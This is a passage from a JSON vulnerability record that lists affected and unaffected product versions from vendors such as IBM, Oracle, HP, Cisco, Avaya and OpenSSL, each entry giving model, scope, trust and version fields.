0.3, "vendor": "ibm", "version": "2.3.1.0" }, { "model": "prime collaboration assurance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.0.0.840" }, { "model": "telepresence content server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "jre update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.6.035" }, { "model": "network node manager ispi performance for traffic", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "9.0" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.25" }, { "model": "aura system platform sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "project openssl 0.9.8w", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "sterling connect:direct browser user interface", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.51" }, { "model": "network node manager ispi for mpls vpn", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "9.0" }, { "model": "jdk update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.6.039" }, { "model": "websphere process server hypervisor edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "as infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "1" }, { "model": "license metric tool", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70007.4" }, { "model": "rational collaborative lifecycle management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.0" }, { "model": "data ontap operating in 7-mode", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2.3" }, { "model": "rational engineering lifecycle manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0" }, { "model": "project openssl 1.0.0m", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "sterling connect:direct browser", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5" }, { "model": "java sdk sr8-fp10", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.13" }, { "model": "cognos planning interim fix", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "10.12" }, { "model": "jre update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.6.026" }, { "model": "project openssl 1.0.1g", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.0.4" }, { "model": "datapower gateway", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.4" }, { "model": "alienvault", "scope": "ne", "trust": 0.3, "vendor": "alienvault", "version": "4.15.1" }, { "model": "splunk", "scope": "ne", "trust": 0.3, "vendor": "splunk", "version": "5.0.12" }, { "model": "flashsystem 9848-ae1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v840" }, { "model": "jre update6", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.5.0.60" }, { "model": "tivoli access manager for e-business", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.1" }, { "model": "java sdk sr4", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7" }, { "model": "media services interface", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "netezza platform software 7.0.2.15-p1", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "rational functional tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.6.0.1" }, { "model": "jdk update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.5.055" }, { "model": "chassis management module 2pet12k", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "alienvault", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.13" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37007.2.0.8" }, { "model": "jdk update", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.6.014" }, { "model": "thinpro linux", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "(x86)4.3" }, { "model": "notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.1.3" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.5.0" }, { "model": "system m3 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x365079450" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.5" }, { "model": "maximo asset management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.0.4" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70006.4.19" }, { "model": "websphere process server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.4" }, { "model": "telepresence advanced media gateway series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "data ontap operating in 7-mode", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.1.4" }, { "model": "unified attendant console premium edition", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "flashcopy manager for oracle", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.0.4" }, { "model": "aura communication manager ssp04", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "tivoli workload scheduler distributed fp03", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.6.0" }, { "model": "jre update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.7.040" }, { "model": "upward integration modules for microsoft system center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.5.2" }, { "model": "project openssl 0.9.8r", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "firesight system software", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "5.4.1.2" }, { "model": "buildforge", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.3.6" }, { "model": "jdk update", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.6.011" }, { "model": "flashcopy manager for custom applications", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.0" }, { "model": "malware analyzer g2", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "3.5" }, { "model": "jdk update14", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.5.0" }, { "model": "chassis management module 2pet10d", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "maximo asset management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5" }, { "model": "infosphere identity insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "os", "scope": "eq", "trust": 0.3, "vendor": "blackberry", "version": "7.1" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70006.4.1.8" }, { "model": "websphere lombardi edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0" }, { "model": "tivoli application dependency discovery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.2.3" }, { "model": "flex system compute node type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x22079060" }, { "model": "meeting exchange", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70006.1" }, { "model": "jdk update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.5.039" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.11" }, { "model": "physical access gateway", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.0.1" }, { "model": "flex system compute node type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x88042590" }, { "model": "project openssl 1.0.0l", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "chassis management module 2pet10k", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "upward integration modules integrated installer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.5.2" }, { "model": "cognos insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.1" }, { "model": "enterprise linux desktop", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.0.1" }, { "model": "idataplex dx360 m4 water cooled type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "79790" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "jdk update1", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.7.0" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.23" }, { "model": "rational doors web access", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.61" }, { "model": "dataquant", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1" }, { "model": "initiate master data service patient hub", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "9.5" }, { "model": "malware analysis appliance", "scope": "ne", "trust": 0.3, "vendor": "bluecoat", "version": "4.2.2" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.3" }, { "model": "jdk update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.8.06" }, { "model": "rational doors web access", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.44" }, { "model": "rational automation framework", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.1" }, { "model": "project openssl 0.9.8p", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "websphere real time sr6", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3" }, { "model": "websphere portal", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.5.0" }, { "model": "norman shark scada protection", "scope": "ne", "trust": 0.3, "vendor": "bluecoat", "version": "5.3.2" }, { "model": "b2b advanced communications", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.0.2" }, { "model": "unified attendant console business edition", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.15-210" }, { "model": "websphere mq for openvms", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v6" }, { "model": "splunk", "scope": "eq", "trust": 0.3, "vendor": "splunk", "version": "5.0.1" }, { "model": "websphere real time sr4-fp2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3" }, { "model": "rational software architect design manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.2" }, { "model": "rational requirements composer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.16" }, { "model": "domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.3" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35007.5" }, { "model": "websphere service registry and repository", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.5.0" }, { "model": "tivoli application dependency discovery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0.6" }, { "model": "chassis management module 2pet10g", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "jre update21", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.7.0" }, { "model": "rational doors next generation", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.2" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.0.0.95" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5" }, { "model": "sterling control center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.6" }, { "model": "sterling control center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.11" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.9" }, { "model": "bbm on windows phone", "scope": "eq", "trust": 0.3, "vendor": "blackberry", "version": "2.0.0.24" }, { "model": "virtualization experience media engine", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "rational business developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.11" }, { "model": "smartcloud entry fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.08" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.2" }, { "model": "jre update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.6.037" }, { "model": "pureapplication system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.0.1" }, { "model": "tivoli application dependency discovery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0.7" }, { "model": "business process manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.1.1" }, { "model": "aura messaging", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.1" }, { "model": "netezza platform software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.45" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.8" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.8" }, { "model": "rational developer for i", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.1" }, { "model": "chassis management module 2pet12p", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "aura communication manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3.8" }, { "model": "system m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x365079150" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3.6" }, { "model": "splunk", "scope": "eq", "trust": 0.3, "vendor": "splunk", "version": "6.0.3" }, { "model": "tivoli monitoring fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.205" }, { "model": "jre update32", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.5.0.320" }, { "model": "firesight system software", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "5.4.0.2" }, { "model": "rational rhapsody design manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.2" }, { "model": "rational functional tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1.3" }, { "model": "project openssl 1.0.1c", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "buildforge", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.1" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.1" }, { "model": "rational collaborative lifecycle management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.6" }, { "model": "cics transaction gateway", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.0.2" }, { "model": "jdk", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.6.0.170" }, { "model": "chassis management module 2pet12o", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.18" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.1" }, { "model": "norman shark network protection", "scope": "ne", "trust": 0.3, "vendor": "bluecoat", "version": "5.3.2" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8v" }, { "model": "jre update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.6.041" }, { "model": "java sdk sr16-fp4", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "6" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.7" }, { "model": "work space manager for bes10/bes12 23819 44", "scope": null, "trust": 0.3, "vendor": "blackberry", "version": null }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.1" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.8.780" }, { "model": "rational business developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.12" }, { "model": "flashcopy manager for oracle with sap environments", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.0.0" }, { "model": "rational team concert", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.2" }, { "model": "upward integration modules scvmm add-in", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.2" }, { "model": "identity service engine", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mysql server", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.15" }, { "model": "sterling connect:direct browser ifix", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "1.4.11.04" }, { "model": "virtual connect enterprise manager sdk", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.4.1" }, { "model": "maximo asset management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.19" }, { "model": "storediq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.6" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.4" }, { "model": "tivoli workload scheduler distributed fp04", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "sametime community server hf1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9" }, { "model": "as infinity", "scope": "ne", "trust": 0.3, "vendor": "pexip", "version": "8.1" }, { "model": "rational rhapsody design manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0" }, { "model": "sterling connect:direct browser user interface", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.1.11" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.2.0.860" }, { "model": "jre 1.5.0 09", "scope": null, "trust": 0.3, "vendor": "sun", "version": null }, { "model": "flashcopy manager for oracle", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.1" }, { "model": "jre update25", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.7.0" }, { "model": "rational functional tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.3.0.1" }, { "model": "rational reporting for development intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.2" }, { "model": "linux lts amd64", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "12.04" }, { "model": "email security appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "7.6" }, { "model": "rational collaborative lifecycle management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.1" }, { "model": "netezza platform software 7.0.4.8-p3", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "tivoli application dependency discovery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.2" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70007.3" }, { "model": "splunk", "scope": "eq", "trust": 0.3, "vendor": "splunk", "version": "5.0.10" }, { "model": "rational developer for aix and linux", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.1" }, { "model": "hp-ux b.11.11", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "alienvault", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.12.1" }, { "model": "notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "jdk update", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.6.010" }, { "model": "network node manager ispi for ip multicast qa", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "10.0" }, { "model": "initiate master data service", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "10.1" }, { "model": "rational collaborative lifecycle management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.1" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.4.1" }, { "model": "rational engineering lifecycle manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.7" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.14" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.8" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70006.3" }, { "model": "network performance analytics", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.0.64" }, { "model": "datapower gateway", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.6" }, { "model": "rational business developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.1" }, { "model": "rational software architect for websphere software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.1" }, { "model": "flashcopy manager for vmware", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.0.4" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "enterprise manager ops center", "scope": "ne", "trust": 0.3, "vendor": "oracle", "version": "12.1.4" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.3" }, { "model": "storwize", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "v35007.5.0.2" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.2.8" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.0" }, { "model": "hunk", "scope": "eq", "trust": 0.3, "vendor": "splunk", "version": "6.2" }, { "model": "project openssl 0.9.8l", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.20" }, { "model": "video surveillance series ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "70000" }, { "model": "project openssl h", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.6" }, { "model": "systems insight manager update", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5.31" }, { "model": "rational doors web access", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.6" }, { "model": "rational software architect design manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0" }, { "model": "rational engineering lifecycle manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.3" }, { "model": "tririga for energy optimization", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1" }, { "model": "system type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x3950x571430" }, { "model": "project openssl i", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.0.1" }, { "model": "network node manager ispi for net", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "9.1" }, { "model": "workload deployer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.17" }, { "model": "project openssl 1.0.0i", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.141" }, { "model": "business process manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.12" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.0.3" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.2" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.4.1" }, { "model": "domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "flashsystem 9846-ac0", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v840" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.5.4" }, { "model": "notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.1.2" }, { "model": "jre update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.5.045" }, { "model": "system idataplex dx360 m2 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x63800" }, { "model": "java", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.205" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.3.0" }, { "model": "security privileged identity manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.1" }, { "model": "content collector for sap applications", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0" }, { "model": "ctpview 7.1r1", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "storwize", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "v35007.4.0.5" }, { "model": "rational team concert", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.16" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.13" }, { "model": "sterling connect:direct browser", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.2" }, { "model": "storwize", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "v37007.5.0.2" }, { "model": "smartcloud entry fp", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.19" }, { "model": "websphere service registry and repository", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3" }, { "model": "security appscan standard", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.8" }, { "model": "domino fix pack interim f", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.36" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.4" }, { "model": "sterling control center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.2" }, { "model": "virtual connect enterprise manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.2" }, { "model": "business server", "scope": "eq", "trust": 0.3, "vendor": "mandriva", "version": "1x8664" }, { "model": "rational doors web access", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.6.1.3" }, { "model": "jdk update16", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.5.0" }, { "model": "project openssl c", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.10" }, { "model": "aura collaboration environment", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "2.0" }, { "model": "system management homepage", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "7.5" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.2" }, { "model": "domino fp if", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.123" }, { "model": "tivoli application dependency discovery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3.0.1" }, { "model": "rational doors next generation", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "jdk update26", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.5.0" }, { "model": "websphere process server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "system m2 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x355079460" }, { "model": "idataplex dx360 m4 water cooled type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "79180" }, { "model": "chassis management module 2pet12e", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.12" }, { "model": "domino fp if", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.153" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.3" }, { "model": "netezza platform software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.213" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.0.2.106" }, { "model": "aura conferencing", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.2" }, { "model": "rational requirements composer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.1.2" }, { "model": "smartcloud entry fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.110" }, { "model": "socialminer", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "jdk update", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.6.020" }, { "model": "system type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x3690x571920" }, { "model": "java sdk", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0" }, { "model": "tivoli netcool configuration manager", "scope": "eq", "trust": 